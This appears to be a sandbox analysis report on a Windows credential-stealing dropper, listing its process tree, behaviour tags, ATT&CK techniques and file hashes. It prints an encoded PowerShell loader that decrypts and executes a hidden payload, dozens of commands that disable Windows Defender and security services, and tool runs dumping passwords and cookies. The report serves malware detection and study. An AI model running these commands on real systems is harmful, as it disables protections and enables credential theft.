C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABxAGMAZABoAHkAZQBnAHcAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAIgBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAAiADsAIAAkAHkAdQBzAHYAaABiAHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATQBuAGMAcgBrAGIALwAyAFoAbABaAFcAYQBPAFYAYwBlAFUATAA1AGYAZwBlAGEATQBPAFUATwBoAHcAVQBNAGgAbwA2ADAAcgBmAFcAawA5AHoAMwBoADUARwBEAGgARQBSAEkAbgBCAEUAMwBLAFMAUwBnAEgAbABUADkAagA3AFAARwBGAEgALwBhADYAZABsAEUAUAB1AHkAKwBhADIAcgBnAE4ATQArAGcAZABIAGMANgBVAE4AVwBxAG4AZABoAEIARABiAEwAbABoAHEAbgBjAGQAcwBMADMAeABVAEYAVQBNAC8AVwB4ACsANgBVADIAZABJAEMAVABZAGIAbABXAFgAUgBYAE4AbgBUAG0AeQBVAFYAVQB1AFgAVQBuAHUAMgAyAHAASgBuAE4AKwBhAEcAZwBHAFEASgAxAHcARgBWAGUANABGAE0AbwA0AFEAbgA1AFcAVgAxAHgAZQB4AGEAQQAzADYAWQBTAFgANQBPADcAZQBsADYAZABpAHAAQwBQAFgAYgByAGkANwA5ADgAVQAzAFgASABhAEgAbwBXAG0AeQBRAG8ARwBlAHMAagBEAEkAWgBnAFIAZgB4ACsATQA3AGEARABjAEUAagBxADMAcwBDAEUAWQBNAFAASgBCAHAAZwA0AFQATwB2AHQALwBmADEASgBuADEANwA0AFcASwBSAHoAMwA5AGIAWABwAGsAWAA5AEoAQQBpAGYAcwBlADYAaAArADAAZgA2AEoANwArAHEARwA3AEQAWQBOADUANQBJAHIAVgBEAGQAWQA2AHkAMAAxAGgAegBvAG8ASwBQAGEAUgBxAFIANAB2ADgATQB0AFcAcgAzAHAAMQBpAC8ARgBNAFIAUwB6AFkAawBkAHAARABzAHIAcwBzADQASwA3AEsAdgBUAEgAZQB5AE8AVgBsAHoAMgA5AHcAbABTAE4AYwB3AGEATgBkAHIAdgBPADEAbwBIACsAaQA2AFgAegB5AGoARwBXAGcAcQAxAC8ARgBBAFkAVQBYAEQANABZAEYANwBLAE4AYgBNADIAdgBSAFYAQgB0AEIAbABsADgAawBRAHcAeAAxAC8AWgBwAHAAVwB2ADIAaABGAEcAVQBzAE0AUwA3AGgAWgB2AFAAQwBRAEIAUQBGAEQAZABKAGQAdABGAGQAWQBUADIARwBIAFMAcABIAGcAbQBDAFYAUABWAG0AdQBOAHcATABxAFYAUABjADYARABDAG4AbABRAC8AUABVAFYARgBYAFoAdABrAHEAZgBHAFIAVgB4AGgAcABvAGEASAB5AGQASAA0AFcAVABCAHUAVQBUAGoAZQAyAFAASABvADQATABiAEYATQB2AHkAYQBDAGkAcwA1AFgAaQBIADUAdABOAEEAWQBDADcAMQA3AGQAYgBSAEIATgBPADEAcwBlAFkASQAzAHUAbgBpADUAVABKAHYASABCAHAAeABRAHcAaABSAGIAZwB4AGQAMwBTADAAVwBaAEMATAA0AG0ASwA3AGkAOABVAG8AWQBMAHQAdwAxAEkASQBzAFIAZgBsADIARgBGAGUARwBFAHUAVgBSADcATwBBAGIAWQA4AEYAbgBRADAAZQB1AGUAbgA5AEQAMwBBAHUAQwB3AGQAMgBWAG8AeQBnADAAUAB1AHUAVgBFAFoANwBaAFIAbwBqAEQAdABFADIAVwAzAHYAZQBRAEgAbABNADcAYQBHAFgAUwBOADEAMABoACsAaQArAGcAaAB6AFMAaABFAEEAeQBsADIAVwBlAE8AbQBkAFIAdAB4ADIAbgBUAE0AdwBaADcASABXADUAMQBLAEoAYQB0AE0ASAByADQASgB3AEkAaQBoAC8AMwBiAHMAcABXADMAcQBLADYAVwBvADAANgAxAFMATgBJAEEAVQBkAHoAQwBVAFQAYwB1AFoASQBNAHEAeQBhAHAAYgBJAE0AbgBJADEAKwBFAHgARABVAHoAdgBaAGYAUwBXAGUAbABpAGEAWABvAHYAcABVAEUAVwAwAG4ARAB3AEUALwBDADYAMgBIAHEAbQAwAGEAUABCADcAQwBXAEEANAB4AGcANgBCAHoARgByAGEAWAAxADEAcgBOAEoAagB0AEcAUgBNAFMATQBDAHkAYQBmAFQAaABFAE8AeQBOAFMAUQBmAG4AYwBxAHQASQBYAGoASgB6AG4AWQBKAHMANABFADIAcAA4ADIAZgBjAE8AaABBACsATwBwAFkANgBSAFoASQBEAG8AbQBtAHUAZgA2AFEASQBEAFYATwBvAEIARAA3AFEAVwBWADIAbQA0ADkAOQBPAFgANABnADYAbQA4ADkAUQBTAEwATwBGAFYATgBrAHgAegA3AE0AYgBuAG8AVwA2AEcAdwA0ADcARQA3AHEAcQA2AGgANwA3AGUATwBTAFgAOQB3AG8AYwBhAHQAYgBGAHIAZgB6AEUAVQBEADMAQwBTAGMAcABKADcATwBuAEsAdgBCAHQAdQBEAHQALwBZAHIAZABpAEYAVQBsAE0ALwBUAG4ARgB2AFQAcgBuADQATQB1AEIAOQBZAFMAUABsAEMARwBCAGEAcQBEAHUAZgA3ADYANwBZADAAYQBlAFgALwBjAFIAVABPAEMAUQAwAEoASQA2AC8ARAB6AHcAcgBIAHQAUQBuAHMAeQA3AFgATQB3ADMANQBZAFYAcwBBADQAaQBKAGMATQBOAFgAZABiADYAbQB2ADAATwBMAFUATABuAEkAQwBWADQAZwAyADEAcgA0AFEAMABhAG8ARgBJAHUARAAzAG4AZwBQAHQAYgByAFAAdgBjAFIAdABoAGQASABRAFcAcgBjAHoAMQBxAEUAOQBvAFUAcwBxAHEAYgBEAHoARwBSAFgAUQBtADcASwBxAEIAaAB5AHgAYQBWAGUAagBjADcAagA0AG8ARABCAGoAcQA2AEwARwBQAEoAdQAwAHgAbQAwADYAVwB6AE0ANwBZAE0AcQAvAHQAaQA3ADcAZQBCAHgAdQBZAHEAQQBoAEUAMgBjAHcAdABRAEkAdQBYAHgAegA5AHEAQgAxAFoASABRAHUAeQBKAHcAcgBjAEoAZABzAGoAcQBwAFAAWgBHAFQAZAB0AHAASgBzAFQAMAAxAG8AdABMAHgANABpAHMAcQBaAHAARwBNAE0AZQA1AGwARgBxAEkAUgB2AG4AcwBzADgAeQBGADYAawBvAFAATwBZAGIASwBMADEATwA0ADIAQgBaAEwAcgBIAGwAVQB6AHcATQBUADgAOABaAGgASwBDAHMAVAB3AFkAMgBEAEQAcQB6AE0ARgBPAFUAeQB1AHgATQBLAGMAZgBEADYAVwBZAGIAVAB1AFIANABuAGUAYgA5AHkANwB6AHoASgB4AGcAagBZAHkAMQBsAGwAZABSAEQAdgBlADEANgBqACsALwBtAG4ATQBhAEIAbABUAE8AKwBYAE0AcwByAE8AQQBMAFQAeABtAG0ARQB3AGkASgBlADgATgBzAG4AUQBtAGYAeQBUAFkAMgBuAHgAdgBmAEkAdwBiAFAAVwB5ADgATgBsAC8AYwAwAFIARwAwAEIASwA2ADgAKwBsAEUAQwBOAGMASQA3AEsAYgB4AEkAdwBLAGwAcgArAFkAdAB3AGoANgBGAHgAMABFAGQAawBlAGgAdwB5AHEAegBIACsAOQBGAFUAagBMAHEAMABHAHMATgBKADMAQQBrAGkAQQBSADQASgB4AGQASQBKAHYASABjAFgAeABKAFkAdgBrAHoAbwBIAHMAcABwADYAUQA3AEIAQQBnAFAATABnAEcAagBuAFIANwArAGsAYgBoAHAASABMAE4AYQBpADcATAA0AEMAQQBZAGcASgBlADkAOABnAEsAcQBvAEIARQBsAHgAdgBhAEkAYQBRADQAegBIAHoAdABVADMAVQBFAGcAUABZAHgAUgBVAG0AcQBoAGwAYgB2ADAAUQBSAEYANQBlAGoASQBrAEoAWQBPAEMAbABKAEQASgBJAHkAcgB3AG4AMgBtAGcAdgAyAHEAYgArAHAAegBVAHUAZwBOAGcANQAvADIATAA3AFgAVABIAFAAUAArAEEAOABGAE8ASgBhADMATwBXAE0AaAB6AGUAQgBFAFQAYwB4AG4ATgB5AGMAaQBtAFQANgBOAE4AZwA9ACIAKQA7ACAAJABnAGEAeAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFoAYQBPAGMAagBaAHYAcQBqAE4AYgBCAHgAQgA2AGEARQBEAHcAZwB0AFUAYQBOAGgAUAA2AG0AdwBkAFMAbAAvAHgAegBTAFAAKwAwAHIAdwBNAGcAPQAiACkAOwAgACQAcQBjAGQAaAB5AGUAZwB3AGgALgBCAGwAbwBjAGsAUwBpAHoAZQAgAD0AIAAxADIAOAA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBFAEMAQgA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAEkAVgAgAD0AIAAkAHkAdQBzAHYAaABiAHEAWwAwAC4ALgAxADUAXQA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAgACQAcQBjAGQAaAB5AGUAZwB3AGgALgBLAGUAeQAgAD0AIAAkAGcAYQB4AHkAOwAgACQAbgBxAGEAYgB4ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAAkAHEAYwBkAGgAeQBlAGcAdwBoAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAeQB1AHMAdgBoAGIAcQAsADEANgAsACQAeQB1AHMAdgBoAGIAcQAuAEwAZQBuAGcAdABoAC0AMQA2ACkAKQA7ACAAJAB6AHIAcABuAGcAbwBmAGsAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAgACQAYQBoAHcAYwBrAGQAZQBoAGYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAgACQAbgBxAGEAYgB4ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAIAAkAGEAaAB3AGMAawBkAGUAaABmAC4AQwBvAHAAeQBUAG8AKAAkAHoAcgBwAG4AZwBvAGYAawApADsAIAAkAG4AcQBhAGIAeAAuAEMAbABvAHMAZQAoACkAOwAgACQAYQBoAHcAYwBrAGQAZQBoAGYALgBDAGwAbwBzAGUAKAApADsAIAAkAHEAYwBkAGgAeQBlAGcAdwBoAC4ARABpAHMAcABvAHMAZQAoACkAOwAgACQAdABlAGIAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHoAcgBwAG4AZwBvAGYAawAuAFQAbwBBAHIAcgBhAHkAKAApACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAoACQAdABlAGIAcgApAA==7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand $MyEncodedScript"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\System32PROTECTIONS.EXE"C:\Windows\System32PROTECTIONS.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32PROTECTIONS.EXE"C:\Windows\System32PROTECTIONS.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\System32REGISTRY.EXE"C:\Windows\System32REGISTRY.EXE"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2372 -s 9003⤵
-
-
-
C:\Windows\System32WINDOWS DEFENDER.EXE"C:\Windows\System32WINDOWS DEFENDER.EXE"2⤵
- Executes dropped EXE
-
-
C:\Windows\System32WINDOWS MANGER.EXE"C:\Windows\System32WINDOWS MANGER.EXE"2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6KMBcrhm75cDojsjt5goub3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeC:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32WINDOWS MANGER.EXE"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 34⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\System32WINDOWS PROTECTOR.EXE"C:\Windows\System32WINDOWS PROTECTOR.EXE"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1028 -s 13243⤵
-
-
-
C:\Windows\System32WINDOWS SECURITY.EXE"C:\Windows\System32WINDOWS SECURITY.EXE"2⤵
- Executes dropped EXE
-
-
C:\Windows\System32WINDOWS SHELL EXPERIENCE HOST.EXE"C:\Windows\System32WINDOWS SHELL EXPERIENCE HOST.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32WINDOWS SHELL EXPERIENCE HOST.EXE"C:\Windows\System32WINDOWS SHELL EXPERIENCE HOST.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Defense Evasion
Impair Defenses
2Disable or Modify Tools
1Modify Registry
5Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
6KB
MD5ca6668ed06b2e2c722232beaf9370016
SHA14b34be1a559de849b40c9a8aa56623f4df9d6a0c
SHA2568102de5b4900fc5fcbb0c013e8284a278ad0f623f76193f33a8b5a43a28d1809
SHA5122883c949fdfbdd1e69e119f8fa38b720f0689ebd632310929525dd383ca42792e6b9cd39996c4c1327d51e11f1952d460b30bd70ef3cc35e4714e9a60c0641e1
-
Filesize
4.4MB
MD53405f654559010ca2ae38d786389f0f1
SHA18ac5552c64dfc3ccf0c678f6f946ee23719cf43d
SHA256bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30
SHA512cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b
-
Filesize
4.2MB
MD5e9c0fbc99d19eeedad137557f4a0ab21
SHA18945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf
SHA2565783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5
SHA51274e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b
-
Filesize
4B
MD5365c9bfeb7d89244f2ce01c1de44cb85
SHA1d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1
-
Filesize
420B
MD551c9e864182413f35b76d42d435df261
SHA1dc5ec227ab38093927a119b4d646c3811c3553cd
SHA256e6c5c674268a865db840afd3764cd498bdfd8fe677c5193d662abbe64d68975b
SHA512b36e683b6487bfbf4e512214343128e57a52eb71356345caba70a98dc5b0bad764da842d08443d3b47bd3dddbe24af146c561ae480038c95f124a51565e3fd99
-
Filesize
71KB
MD5899d3ed011eb58459b8a4fc2b81f0924
SHA180361f1e0b93143ec1ddfee156760f5938c85791
SHA2565e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954
SHA512802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05
-
Filesize
32.1MB
MD56dfe20166084ecd3eae2b8e1a660e65c
SHA156ad58da892043f0211d1c84aa605a40cd21471c
SHA2569fc54ab556cad14177b74ca9df7f0ae3f0354ba37edd8dac3a75ae11af9c7118
SHA51223aa77255e7fbb64792c4d88fe9c447fc3a0ae25da0c063046172ad6fc679f55e227dffe0dde093bfd32355a94cb2c7f400a13e28b93a68ba17007b18f88617b
-
Filesize
70B
MD5d90accebb3f79fe65cd938425c07b0ae
SHA19df3812a88d87dd419cd9e89afa5fb1d71be0dc9
SHA256aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e
